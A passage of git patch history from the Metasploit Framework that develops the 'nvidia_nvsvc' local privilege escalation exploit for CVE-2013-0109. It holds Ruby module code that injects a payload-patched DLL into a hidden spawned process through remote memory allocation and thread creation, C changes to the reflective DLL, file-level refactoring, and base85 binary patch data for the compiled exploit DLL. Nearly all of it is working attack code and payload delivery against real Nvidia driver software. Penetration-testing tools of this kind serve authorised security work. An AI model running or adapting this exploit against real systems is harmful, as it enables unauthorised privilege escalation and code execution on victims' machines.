} - pay = payload.encoded + dll = '' + offset = nil + file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll") + File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) } - bo = dll.index('PAYLOAD:') - raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo - dll[bo, pay.length] = [pay].pack("a*") + pay = payload.encoded - pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) + bo = dll.index('PAYLOAD:') + raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo + dll[bo, pay.length] = [pay].pack("a*") - pe.exports.entries.each do |entry| - if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) - offset = pe.rva_to_file_offset( entry.rva ) - break - end - end + pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) - print_error("No offset found") unless offset + pe.exports.entries.each do |entry| + if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) + offset = pe.rva_to_file_offset( entry.rva ) + break + end + end - new_pid = create_proc + print_error("No offset found") unless offset - if not new_pid - fail_with(Exploit::Failure::Unknown, "Failed to create a new process") - end + new_pid = create_proc - vprint_status("Injecting payload into memory") - host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS) - mem = host_process.memory.allocate(dll.length + (dll.length % 1024)) - host_process.memory.protect(mem) - host_process.memory.write(mem, dll) + if not new_pid + fail_with(Exploit::Failure::Unknown, "Failed to create a new process") + end + + vprint_status("Injecting payload into memory") + host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS) + mem = host_process.memory.allocate(dll.length + (dll.length % 1024)) + host_process.memory.protect(mem) + host_process.memory.write(mem, dll) print_status("Executing exploit...") host_process.thread.create(mem+offset) end From dd32c2b0b8a7138de7ceef80c5bbbc57592a7189 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 5 Jul 2013 22:56:21 +0100 Subject: [PATCH 038/205] Spawn 32bit process --- modules/exploits/windows/local/nvidia_nvsvc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index eef3e92e05..0af1d9c9d8 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Local def create_proc windir = expand_path("%windir%") - cmd = "#{windir}\\system32\\notepad.exe" + cmd = "#{windir}\\SysWOW64\\notepad.exe" return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid end From 3d1646d18ea4dd5686f874a192cf1827f3dcdf24 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Sat, 6 Jul 2013 09:27:27 +0100 Subject: [PATCH 039/205] Exit process when complete --- data/exploits/CVE-2013-0109/exploit.dll | Bin 52224 -> 52224 bytes .../exploits/windows/local/nvidia_nvsvc.rb | 4 ++-- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/data/exploits/CVE-2013-0109/exploit.dll b/data/exploits/CVE-2013-0109/exploit.dll index 4600b48bf586e883978e45b55d28f858d26660b5..8fabac9fb53c58ff9f391bfea4fe9104d383554d 100644 GIT binary patch delta 1773 zcmeIy|4*Am90%~bryxbXRiV(qoSk9P@TC;9F$d4n)~;-9RL8dgo9Nh}SQ-LkbORMP z7?Plk2s@+8M5M#ul6^xC7PFAqZ6p%o4|C$c1S7fyyJay%li5Vs<^`sr{tk+r&BqWPBp6n#rYHSEfh6V$|x#BQd^>|*Tgcs&N?>xfS%FAJo^ zW7R#fb}bu;%c6z+*SH(h{yZXv3^$3!O#_)55TLBN5uL88KFrmc(Cn0y0CGr;m+$_)Wv2pa%mxpHLj0PjyR;8 z%~#4S#zdOW_8K#(oxN)msh)jpETU`KnoJX|=Q}ea=@XR*$CYbc$;X%P$HiVVt*1Kv zjwy^%KkLh~;Yy~n2E)P#&Uu-fWxg#*5h&@GYURKBEca~*5wPZPZUvp^a&7??$T{wi zdg5!x5F z^`ZU3_LH=R&uw2P&~EiEg!nHANd+711veaqx8XSS!x&7#EG&XBN=P*5!2}hf zZNCz8~LMXs#@F*48_#J#~kjc86m}gIj4gHlVxSxxd+2d2n@jUrl{I|KVdE;` z`42x0?3aP0|L+0!u=Ht3)Eb)CTIVS|*jVjsZsxlNeUv}&T@=Jm9^TI%xHhHuj|A}l z9xN&n2?-rn%KG1$58e5Ujt+P0;%0M3%zm@e(qwtdGH$tKnY08gy#I24=w^eMFV=`I yv0MB=91$nPSurT;q-4n|RY~pApfn-*r8#L{B4)kWYOXT3n+LJdJa3%r3;P#+x?8gV delta 1753 zcmeIy|4)-g90%~br#RZ#VkZ>h>8ZwBK*=>q2 zBvG3&*d>f?#1zQfA~-rvH$#j=F`GYZkvSu7VH;7$IlgX*1?ik+m63ROF|P(`uT`yH<@XF)A~8h(EG0{JUMZ z9>_9!XR_jSDe1{jh}kpgmv{O9l=IX-Dho*Ffpjk97ocTQHWcD@Ig0pYhnyF6MQJZa zjX&J=cWaWIr(ftXU$Yoc%DUGkS{5?VsUu3KL8WVFME1sD0d|CU>gEUgV`CU|Eyb0kFsYo2WSl& z&m5t}tUfEtw9rRxRfl|tUz}azA(+1u^Y6xb zv@@$IkruL-P1&@79XE+InSEm_qeiwO+f3bjd$yK7<3u=)+~7`ofBt;-vDeJ2Xd^#n zj;1uodUI?zk{daJ=;-hW(O(RYu)$49OOev^5#@hmgb!|t5-{e;d?%gaa()RF!lS%Y z>Y-1I^NaOp-9|QNxkoqh@2#H-IP|w{mDurh+ge(|AKJPE>SUcoUQ|VjQjoZWtskH~ zwzU`K=eK=GYxvBz6oLBqzc2hwaTV{BbSb}L^ zs|aG%1-mjRw%p)I!?WAbwoJJe!&ip|J(BB}3RqGlZZ>1KS2bvpA(V>B9wv?>cIiv}22IJa)PaUmYTVjhA&;6N_eXZO~43mKT_z`rs|!pM%UgJSGCL6+}PCM<-dI-3%UoNA^!2t z&i*=)^nc!wcU_>Iza9us-3nUdYw+6lH`TdXTDWfLOCj&cdECY^Dan4~7XHt`EQAwr zMeru%ak7U#rYtBVoH=>a7#FlmSX|a->mlno>$vrbHDV=%4_q8rvcV{B6e~oh=o62K v0dZ8kDuzV06epP_yVNZ8NTX6v`c|5f!jj%%w%9GrmL5ycGR2#&^hW;&-jY#X diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index 0af1d9c9d8..aacc27d015 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -24,8 +24,8 @@ class Metasploit3 < Msf::Exploit::Local super(update_info(info, { 'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation', 'Description' => %q{ - The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user can - interact with the service. The service has a stacked based buffer overflow as a result + The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated to + interact with the service. It contains a stacked based buffer overflow as a result of a memmove operation. N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr! From 6916f7c5d2355fa4e779675ba17bfbed3a20c5e0 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Sat, 6 Jul 2013 09:29:32 +0100 Subject: [PATCH 040/205] Fixup description --- modules/exploits/windows/local/nvidia_nvsvc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index aacc27d015..f47e3657c4 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Local super(update_info(info, { 'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation', 'Description' => %q{ - The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated to + The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to interact with the service. It contains a stacked based buffer overflow as a result of a memmove operation. From be4dae7db95e955a47ed0667c1eae02b79bd0597 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Sat, 6 Jul 2013 09:30:09 +0100 Subject: [PATCH 041/205] Forgot C changes --- external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c index d70da51fd1..cf73a8a853 100644 --- a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c +++ b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c @@ -22,6 +22,7 @@ BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) case DLL_PROCESS_ATTACH: hAppInstance = hinstDLL; run(); + ExitProcess(0); break; case DLL_PROCESS_DETACH: case DLL_THREAD_ATTACH: @@ -29,4 +30,4 @@ BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) break; } return bReturnValue; -} \ No newline at end of file +} From db29af0f97d41f4efbe7b998c128f09e6d70d703 Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 6 Dec 2013 07:37:40 +1000 Subject: [PATCH 042/205] First batch of submodule refactorings --- data/exploits/CVE-2013-0109/exploit.dll | Bin 52224 -> 0 bytes .../CVE-2013-0109/nvidia_nvsvc.x86.dll | Bin 0 -> 77824 bytes .../source/exploits/cve-2013-0109/LICENSE.txt | 25 - .../source/exploits/cve-2013-0109/Readme.md | 40 -- .../cve-2013-0109/dll/reflective_dll.sln | 20 - .../cve-2013-0109/dll/reflective_dll.vcproj | 357 ------------ .../cve-2013-0109/dll/reflective_dll.vcxproj | 266 --------- .../dll/reflective_dll.vcxproj.filters | 32 - .../dll/reflective_dll.vcxproj.user | 3 - .../dll/src/ReflectiveDLLInjection.h | 51 -- .../cve-2013-0109/dll/src/ReflectiveDll.c | 33 -- .../cve-2013-0109/dll/src/ReflectiveLoader.c | 496 ---------------- .../cve-2013-0109/dll/src/ReflectiveLoader.h | 203 ------- .../cve-2013-0109/dll/src/exploit.cpp | 537 ----------------- .../exploits/cve-2013-0109/nvidia_nvsvc.sln | 22 + .../cve-2013-0109/nvidia_nvsvc/dllmain.c | 33 ++ .../nvidia_nvsvc/nvidia_nvsvc.cpp | 546 ++++++++++++++++++ .../cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.h | 6 + .../nvidia_nvsvc/nvidia_nvsvc.vcxproj | 142 +++++ .../nvidia_nvsvc/nvidia_nvsvc.vcxproj.filters | 10 + .../source/exploits/cve-2013-0109/rdi.sln | 32 - .../exploits/windows/local/nvidia_nvsvc.rb | 299 +++++----- 22 files changed, 911 insertions(+), 2242 deletions(-) delete mode 100644 data/exploits/CVE-2013-0109/exploit.dll create mode 100755 data/exploits/CVE-2013-0109/nvidia_nvsvc.x86.dll delete mode 100644 external/source/exploits/cve-2013-0109/LICENSE.txt delete mode 100644 external/source/exploits/cve-2013-0109/Readme.md delete mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.sln delete mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.vcproj delete mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj delete mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.filters delete mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.user delete mode 100644 external/source/exploits/cve-2013-0109/dll/src/ReflectiveDLLInjection.h delete mode 100644 external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c delete mode 100644 external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.c delete mode 100644 external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.h delete mode 100644 external/source/exploits/cve-2013-0109/dll/src/exploit.cpp create mode 100755 external/source/exploits/cve-2013-0109/nvidia_nvsvc.sln create mode 100755 external/source/exploits/cve-2013-0109/nvidia_nvsvc/dllmain.c create mode 100755 external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.cpp create mode 100755 external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.h create mode 100755 external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj create mode 100755 external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj.filters delete mode 100644 external/source/exploits/cve-2013-0109/rdi.sln diff --git a/data/exploits/CVE-2013-0109/exploit.dll b/data/exploits/CVE-2013-0109/exploit.dll deleted file mode 100644 index 8fabac9fb53c58ff9f391bfea4fe9104d383554d..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 52224 zcmeFae{@tuwm*70-ANkg(2XP*1SD#s(V#|~ID{q|Bpm`0>=5V>ApsO(n?b;E4&aqQ z;z?spidM!SbG2TV1v4{;H)9rro!6<;qoZ+P%xus+5&!53EefySq5;!Bxwa z-;|Uz)EO<>Hfq+Wf^|+$?77bLgr^+g>r8KW@`d}jXDr-l_T8Sl1l$CVMZ_}^zRvWv zXQl|hF5I~f+~=pVVwij3n{A4hes%QYqF7wJ6nE7y(@;s;fSB1v?9r>>I`C{2VTbU? zNm9II5)m<1YDXl9_2|cv6er~(5t%4oziR|TuSrrVVmp2>N$Hdvij!V5ilWfKUt641 zmk4_QOp?Y9#QwnNeFZRsV}Ymj$I6Ss+$1kwFT>yP2wsFAwUs(~&|jJ)ExD;`*;09_ zB#oYc1e7UVi>C(9pub#HeUkwu@iVA2gv3#Jev4<&UoKK^s#;TZAL2w?(Pjz%rMCtF z!JA9vRV`n!3V^pIAp$gzhQr;5XV71+B;7eE`2TzVKcK*TcB-gS3VM3I%wsK@>uvG$ zQZ0IlWvk>kcYI9f8c#3#TUpbg=pW$KQ&v~Vt9g1gPtQO`J;jC`>{94MhbkrfGt=9T zVnbd%1zhG}t-)y~QF^$)WTS#Ta{*S-Sn!49*fR}Y`|dWjza;#HW7z)JiI3l&g_JX| zxIz_;v#vHd8fW9RXBz$*=TUG0y%y1H3B8u#)e`T;dwnkEHY#=Tr4_cs`;khOw#2W1 z4<7hdlaF%P5PW?){vrv%Us9S@Pw;BU@4q|hwFe==iH7^v9H9{4WgPP-`faE{+EAa za%dZzX`1Xz<;gQ8=}inP388s-7T{T=Epjg5zv$C-Ezh~ECC}-nHXzFiB(6qSrtt=M zJxvsd+n~MXtRe4n&N?{!Lu6&g5voV1rOvqpjws?SCrurIe%eTQ7LJrFV4j074iEnV znf+K{B;fxdoM4^vARM3emUBB?FUliVl=qsG)*-}*nd4634IzeBD%5hoa9ZKGbbft- zB(bEIe+RZoc@^(%+ws!2INOk1!IEC1(9_PN2nFXk{px{KAP}N7z=)FOIUO@9hm`pD z5ab4D0e^8AO3ZVPWw|}-0h`)mu|HnL?^lq@pOvE2=k}@C!nsU&}^pzMHlHQ z$tVN;VCxK^NPjv3SP1|a1HWWuoy)wvd~&a@s|T#8y6%^N^LqV@2=X(maHyu%vdpy+!`yS3vU~ zZMJhBe~5~n2UdF|RVyC5t%JZ?Yd_cRgoC5@d@hPntnO}m-IW$esy%;tNG$vB@F3aI4B>vlXblt0dte5yRQ5zW7$>XUmc+fc15uUryBx!ef*~cS~ zX~pv>W_DpbVip)NizwzlKekF5BeoThPZ8%*{FINtP_vzx8has@HqSXpdx{v8(yt97 zoe^JxW|>A_tnAd(Ng8X1PkX9^!hm&*9AcEtxQNl7Iz{PgmS}61X>0u2niblb)!G_a zTeDtUvq9TYL#aFJ@NQAJ;!T5C+d(5p+d%_J+d*TeMSU6XToHa%youkm9W*ku9U<{P zAl|LweMr2C_q83w^V*K%;(ZeD+Hg_2HHu>w!i4p%yDezLSqg!G@h4xfN+bKUHzxuc zZAXvD+AH3KpSHsy-XwWwJ8a_Z5btF1P8IL5^k!-Fe#%L2H68EZo0)ib{ujn@v}^6n zKj_*UtVkW`+S|&$-?dX`e!pwuj-ZCwnDz#`cb?O!^>^{xWyryZpy3a_xHQ8MWwFG z6=|aTo}!M^cC?E(v6{Ani}xw0r^pH)TgJw?4o@!It< z_Mo1mnBU$->_I&$*rRkqqF|4Ch|qS3F5V%!cn5W{w!>f>>S%4pB=Mds-c!XpSG@D+ z%?jxK)NFdIUc7^EF2K9_L;!Aof`KtM9YNvImELZ{)98hZ<%((=TC< zi399WycszR_Mnb`O0WhRUPbu?dw>nn4Ym<%GS4~DU=K}n4H2pRZ}uqLv{Og)&j?G( zh;0AcEJW-~EJK(Et{4LRh;>AF7Tr5sbZ0N2%>*xrsX$X{oT_38v8nnH`=jslVAYecnB+OJ^2v!1?`X-w;`SExBbF#Eby(x_EC|sWmrDzY z2O+F)k%Ru{D0o{m_=anwtOIj zCn6;Kz9Zp-Nx9~C8ys~cj_lYeg^(Fhk3uNyC469;SYfS=>}`vLEzuF zXXxx=Wenk4*u`c7-&$rthA0A>r+p9(>;AyX&Vt}-HJ9Ye)anjNwyD*pBsoE?ZkLoK zb_cp9pxXoYL-uqXWRFZ`^TvBCbIlk15_)iMkyhQM&p*ZPp2xa0rI$4Y4$8wb&NMjc zlM`}hD(6^rmwk6hf_?Xl78YMFVHR98b;Tr=1!Y~ z3}t84mh`|8_-8E=7E9+%>SK7>HG^Gc;y9pek^q8Bx`h3o=Wb=F3T8H@`=1zjtY~_5wRmSP8lNNDv%8v6wsC5vBDnnObd}`nnl#B)DwQ|(#4ihH=ohx zx5H~H){iY_&5)Qef4Gw*Y=M-xGfkaSFdiyxe#fhrLH<1j8-b9kJ6o~Zp9#5}l@y+Z zs1~85;K!4}xUG6*F}Go+sZ3i4>Q|ch<&ZH;OVRE8pC}4({5KTCu&1?oeY#@he~!j4 zh3v0+I{5oWxP+%*8NxmSj19ihIYe2BA$>mTY~ue1P--ZRs<>KI(Iob5YOBe0Fgrf< zC&^)dI?TdNl~#WyA^$1R!xX3Xn3R9x*Iz41=&3|ksFM~>KJp49%x^+Mq?7NRKznoS zwj7NeJ22giLb$ONW%B9c3G(4Y{x&o-kq`MaOb>z3`ZT`(D&e`jQsVLB&_EPFOpiZ+ zJe`o7Bz`y2BL`i&yG2=;okQ^(YxN{@wd&sNoY|j%;PHI-m6DWQ?NID|JmC2~sD%Fl zmB(lR5=otp;^oo_Y`B^u9l-uaj^{T6v?)@l_QWZr{2P$SpNs_s)VXC0bpY#fpR?E5 zKu4dRCGun?qe?v`4UN>>z>b%f`1o}wq_k8|8H-48`W%ZMN%is7piXIL8#+PlF)N8B zd~GTsT%lb4?np_(x&Q|85{=g)$j-BWurjDFa?zKVd2QJ#)JS{XJHT39-YdDgurFhnZ;iBbHE{nPe*-JM95yJMx%V^MU>iSQk1d2hcx~VF&axIm223tpDGGAp>B#(#zTVwS{i3}c#jANct%!Gm2)xV+9c;dhp8_hSV! zB)odcWMcnxr`$eejCASwm3DMrtY`Yp0D38IW~M<*;fvTR6vxl{o$T?W(kBKxv&fB zSL4H9B``~(+M~ycr@2a8>y@+R)bWKfe+fMFtGfK9?k*R!ZD zzW8$BY4pF3DOS-wcURTbwS9inz3vM3K}Ku%e7qWV6!G6)hYjHzn^c1=k)djHnom!e z3bK@!83jNesP-gRk5WSpFMk-on51e840wQG#=<0LWEsdITJ8>4jn5Gkrq(X8>6>&t zBaDWMf=YmTX<3tzHy72#@)laD$n(k7Bcpi)lIi~foLcAOD}a@kJMb>Wv?g!h88j7y z(%fB&#TAO!`4|z-MR*Cuy&m6t97@f68*PJ>ImIQxsR0Q@RPT`91SusYt(ce4M585w z@*{)!$(3NxfE5E38s!EDwn7W2c(|kDBk}%Q1{mGb>o34QB;@ zZH|QvcPF(Sk{t47EUEroOiu-?l|-HeDMm|R`4)Hl)`LhK#gM5#-O8U%r*bTa?ao~t zrzEQdtK(3KDKeB=XG`b(2+6CZa8-gh)n%Sx29K$QvnQ? z%1HhKl>O@D8z9Gjxcv^^fCQq|razT0jFPVQ)Orj*L(lmRG|a`UESb966)MpoS5(`A z!52xt6|xB(M?22TYZQQ_cC8-~)}?MRm7 zp)Bw!JnE9w-$7pJ{2SCv-TAg$rQFBkXbO45iY1K(=NPr8543JoKOfJ!!hP}K&lAkH zoivIgaqQjhY0gc`F9~im!6gH(eLO~8xIMva2}Yszcjr25>;aOYUES_Jd)@u;HC*mG zsO>yS81HNs@7M6If96}f>yFs#rU0WE+TH^QW(zR;mg^7|yt94kf^~NLzWw%nH8cgP z?RH{F`@Xtx4T6=4;T}t=7I+%@++q7;haj*(mzi=aAcI6JRJRq5wo?#mry$}^LB5?` zBA&?C`3$n54wa|Lvs7-DZ&SHdo={LAryyhxtVOaKBzS9QWxwCjS>EqAbhKAbry^GCN znmJ6yR(p!=Py7QtZ?8k^B$ZE- z9pIk@c&r5l_P~~S&~JZQOJFN1BniM^eS>bf!M$e@Ef#2PZwI_u;5odrMMv9%1*o7! zbYB8;b~Yk-Erghe`B_T*VHI+w zefRWUub;$`V1OF#4F+gV@bc?#LXHC@ppI_|(1@iaP)7gq>wP&^ciLNw3AU~w`td!H$o>lh1FOb$P zda1@h8%Rj<(r9m>?UDJ+)sHj(<3C7L#zc5Q*NtpxvaNyzXv(b65+YW^t0fE&rW0#h zbmZk4Rba-Hn3#mlg{2xo^*2D3nOQNE8`jPb5KuRG2C8tBLLHugMmyn0}4?O)L{32HNe zsH7xEi!0HydZMtUr8RqLh~KZI22KnHI6DAv$BoK}XlI~x81}>*C7najlSUh;zqBAN z!4ap**Vya!Vm<(0*KMWFrgdRAGPa0C`Z~Z~(%G0ELH*T$Y!CpJqUOL+6qQ*Y_!FF# zKpWm*0;zL0V9;C0U=PftlAA2u;WRnbAV+r?qKp0Q>AevPjhg?6j06=a()=G-2agN@ zjR_ptbomCz)oVtaJFXs)&V4%2xacU@iaz<2^(b+!6H(e#+XnH$6{?tf&xvX1Ql4Nf z!;T@0Mqc-7z~ zWP94({K0>sllRiN*0B%LH~mEy0twqI)*>)vtKM3En zyZB0g4m4ljOLK`NkJNXPhbtrxy(HpFnUDw@66?i^T^Ev5Snz28F(Dwkx*OU$o6-Is z5p#{{k`?wYE_c1ZkUxJ)*AGIhmu|ppa-HP3IUQSfJfGm{z;na(l4Bv#gn|KLexnt; zr+(3$lnIxJ?$#3ZqAn*E^9E>rO4XNW?=Mx(4hA~lsl?806{w0;4IyKf9}HvyZ5-o?-eid7u=@CxwlyIJ>Zmrl7I3S#th+8VQ{1>tDb595c zW*$qh(4qy;BC18yM~VnzR%bJNjpdIO+O#0y1-%Jk1cImVHgpe_P}Ld=hoDeSU>8g( z2QY^NicMRz(a%7yS4yNM%1)0Ml=W4b_FWD|gs(D=zeDrb0UNg6gOn2G#;!`wBGMX4 zFpP6^ncl7|sk)MkZ4jy;?c{$0okK9hp+DY&fO;Ugf9LKx=(fDS6-%@{a+-Sn#;Vi7 zg1@WhN30uOnX~{MW_kZl=- z{fgk0TRgq4cf8tit}8t-AByU-gl$pRGFl>`&?@X&rjenTRJxdKC;nDe6f=-9bX})X zu~W49*cz)VOA?xugl3Np2Zsj9>|>sc zAoHCl{S7q z0YF0z5^MP@Fkr0PNIwI=zIFvaNxJP=4$OWMpA2-GP%ZF4@m?TW+Js_e2oH!~bZvT*(+Lo^=Zl-G}Q>bYlL!*&|5|*&j|hA2o)Hi7mU!N9O@>jr4aOMGG4yAJWdTeWnokjQk40=E4S>d=T5UiMb3JnojaZ3iXHqJPeA-owq1!ZKD zk7fA*OY~!Y8@Y`(8b-(bk_d>=cg){|(NWSUj$4kYIRpW_HL9VJ2Aw=g%^^TZ zPEvCSND>-p=Qe6iBc*JkvDXq$85i6J-WMk~BCj$08>8dYUKa)>jX@8CINHH&M+CnT zl-08+JIl&LQP{zVi6M%tZj@&rYfJ=DWJMjk6337r>U}JSc2NG&lWF*fc7Ck4HOA(U zyx8a=9HOHq^U~1+aFjEKM$SHT^Q9vPisMKke*p1N@h&!2KB3~h5nV)mx8zgQo3a8Z zfFE%x^#+V0SeG%Jy}S~kQY|5-=p~~~>e?5s1~NUR=(y{${ zHX_YXM6xc@xxUL<77s22H5+ok*PQs!1YEGM2P)Ga8<#W?eA&?v@@S&(u{zuFdekVqW-+>q3M(6@Yndd9<|J;L^`>^os zu_A4s4KExXyPMb88IBK7VH+$J+;I!1PJGR*r2_DXg#YHaJpzx!giWf8m@$_;ui);3cC?qgN&7nf9I7k+848;;g84~L$< z&P?7^*oNaI#N4!xAR%tLKid$;KFc0Q)m8uW?E`QKL;i)Bxj^tDHJ;Mag7qRtqC33i zmMBi@60=mZWPFXf#3dQ{;hi=V$lWY4J5Vxz0HoZ9tB!zojVd<$CX&EJWiB1Nm8Z8s zs?WFhU%+S&=G%~Ky~t&+BYQ|a->Q0gEHiXZulwSL$6Y7b87e}MjU-lG9!7O1)XcHe zL>_9+x71?W9behKATl&KU8idWYUrORQ%0GrN5%gBPAvSlLuiQN=9&PT8cDmIY!axH z+{h3zAh5t|{Q*w$MBoz{N?ZahFv+mZaFZ7@AUt+pbufxD^vDE4z z4BZW{FD`FVa}L2P;Y9yF$QxMV$>^g5UDAyc0dV8b(4eU~vT25oUr$GvK{>(HkWd#= zzOJ;)DB9j9)JQrh1o)#Kwb%0x5N|1G+vw$M6FvaPJ z?OVU@ijBDrntQKt~hC$8kS1TZOwx@T;)%K@D z`G|^4)e~WvWo<~PkGoTwZ)>>HzN^Wb&wmZ1X_g(SC(;~=)4f7lLxS$H)tmBB0jjGz zfg?+pvMIl-xtJ!$*IXQ;{2C=$n(x$wK?s^@uj>RF4GB}zWXsecNk!N5|&%uGL7r@u>H?a6qBa<2u z&^)7Ydg4G!BT4+ zS(2Qx6}wLOO0vfh3xWeb$GYSvL-2hI(4oHK`f-bd2viS_-bQ9gT2?L++)Z*K+BP{= zF_UrK{NA9a$6H(+tUk+0e~h^R({m1Ly<^QRR(KXCE^F>&J>jq7f)+bW2yXN8cd-sa zVsoF7ua9Oo_m%jlfP+{9i~#{vu16)U|mJF zOU48o2OX)>6Lq^vSk6|!`Fy^NCg0(nTyL?@r+LomAJd%MEKl}wH_$0Xix9fO2Me(t zudbX0l>RYB26QsL{4ZFA$fT@TPuW6sf;)#q{g@vNw0wIctnvHkRq~_q0!9rckUds{ zqSwEKqB~U%ERB#Lo<(i0gAlBr2{)2F3j4B{VEP=A)Cm+BwG8s{;Ax^OZRu{MC1%bd z=nGi5B-;T=KV%EO4js7UZmIgVHY|MMH5Me{KpC8o$h=nAHS2-ywx7qh2%IWj&_Ajfn>PJeojmsj5)W9MNlrLE*_$w;H?jg+# z<|riz611293S3{M?Xd!E% z<&ZeQP${nx-zdE<1uDjusaLxUt2c6A6ycz!3ve$Goad~|)8&E%oszikZj>Bx1kNZn z)|@nAh9rgC9mBdbp$|KEOv|EL$`@l~s1vqhDVCZl9sYK(7cYg@*L6ZG>wu}$&&-%l zw6fkx^J1;K-JL^5PSx|+Ibq6_J$Ae7VV3RPxi(d{d-;CskI5cHHtR55(~~!(3ot;y z1_vnC0Ywp`Puk88;OMT@u!tJFeMV$kY@-f6HsqZSo(e1=s`1<6P^dvZn3ceCEgzSB zYCbo+PSn7PH1~IOkwMOe>aK*{o`H?;#)&0fAHSFI_VR7m5MWY)DWe_v>Ov3O)%NeS zd>guOjx9}nPhX6TY6Y$|B$TtJnAHhYgLM=dk}M!o8oAlWH(*+#c{QHa^YLWIlZ$GT zef&Jo^YSD}kEQ31myQWV4Sy<={nCGdmPyd_x^%6&L#sZC#@tDbfs)A8ttstpVKQb9 z5_=0m1TEXMC(Gqb5(M?38S1CRL9Qd1m3w2fWCgbFuqxl2J>RN~@bX!N84>+T5Ir(F zyV|NGcZcJsKW>gD!9K?WF~65Xu8{I0buK7y+G8Ez<6A@}&@md)HZ&x(j+xL2vYB~K z^2fh6dg4_iU@K6LaY4&J3*gfx3$aPhR9jMGvYc$o zSNohBKEljE@{3adVxEYcW_mFjN6g{dN14%)5J*O<8!aX|sYL&%gg*R5(pd zP*7XlVvA698Bgj@;@iK%A?{}}Yb9nArb;kcvhT|?S=9F2=%fZjP-zPP2;fm8s++Ml=hB1u zV@tfe1Of)kmv*S6+GLbz%t&a{y<2@HS;^NH*0wa_?5o z1vigFa338|HY8gS2cvwko(glLiKg= zG(>W-6rODed;`$t07axhD9a2!|1BcyyISqL%QGJ+9c0 z7N3QcrF0tsX*2vxKqDJK2W$1g8B*kNrgWeJvS5lXLFy@NN=_693%mHdV^E8X+j9b} z*Vm_9*%D7)kO9)y9@IIxtQU)8VUN0W^>>k}YTtLtWrIOp14!hA+SjXGMh7anmVv~` z0m_?5;w&r=S@VGKns&)?D$chQYYAV5{$M>=QL3%(K4my-;%|T;kjJ(G88i&Lqdm`} zvGzLJ6Vl2Y%FOA4x9Y1}oqtCb7cwAg^-kgU!*Ac+g5~-xK{3Ux$HfvcC}=$V z1W{sy2B(kp!QKZZG+3m--`XPkhB&rs6k}0YoN<9-MyV>wPG# z#%jgop!00Hg^xfMl&Te5BW4YUkH(y3OjVE2R2BI@*;&LV_P{(8j5)IZto@ev#Xv~* z`)MHj2`8y)VY|+M`X%))qz6uB?`*Ljea;`k;KfOSd%DG5S3+Hp2DyU2ig8oQjt5TI z>+%u#dOdK%s9_h+yrf=(TL#ET_5s+)d)m>70qP*8oYd(+D>_O>uzY`xaem?zN01P4 z{lzSYMuz@zcmC=)d*Ewi>yD?Zh3M)gue40g+Dgh(npoKlQ9f`Di 